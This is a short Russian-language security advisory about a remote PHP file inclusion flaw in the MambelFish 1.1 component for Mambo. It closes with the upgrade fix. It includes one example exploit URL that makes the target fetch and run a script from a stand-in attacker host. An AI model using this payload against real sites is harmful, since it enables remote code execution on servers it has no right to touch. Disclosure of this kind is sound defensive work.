Программа: MambelFish (компонент Mambo) 1.1, возможно другие версии.
Опасность: Высокая
Наличие эксплоита: Да
Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.
Уязвимостьсуществует из-за недостаточной обработки входных данных в параметре"mosConfig_absolute_path" в сценарииadministrator/components/com_mambelfish/ mambelfish.class.php.Удаленный пользователь может выполнить произвольный PHP сценарий нацелевой системе с привилегиями Web сервера. Для удачной эксплуатацииуязвимости опция "register_globals" должна быть включена вконфигурационном файле PHP. Пример:
http://victim/[path]/administrator/components/com_mambelfish/
mambelfish.class.php?mosConfig_absolute_path=http://site.com/evilscript.txt?
URL производителя: mamboxchange.com/projects/mambelfish/
Решение: Установите последнюю версию (1.5) с сайта производителя.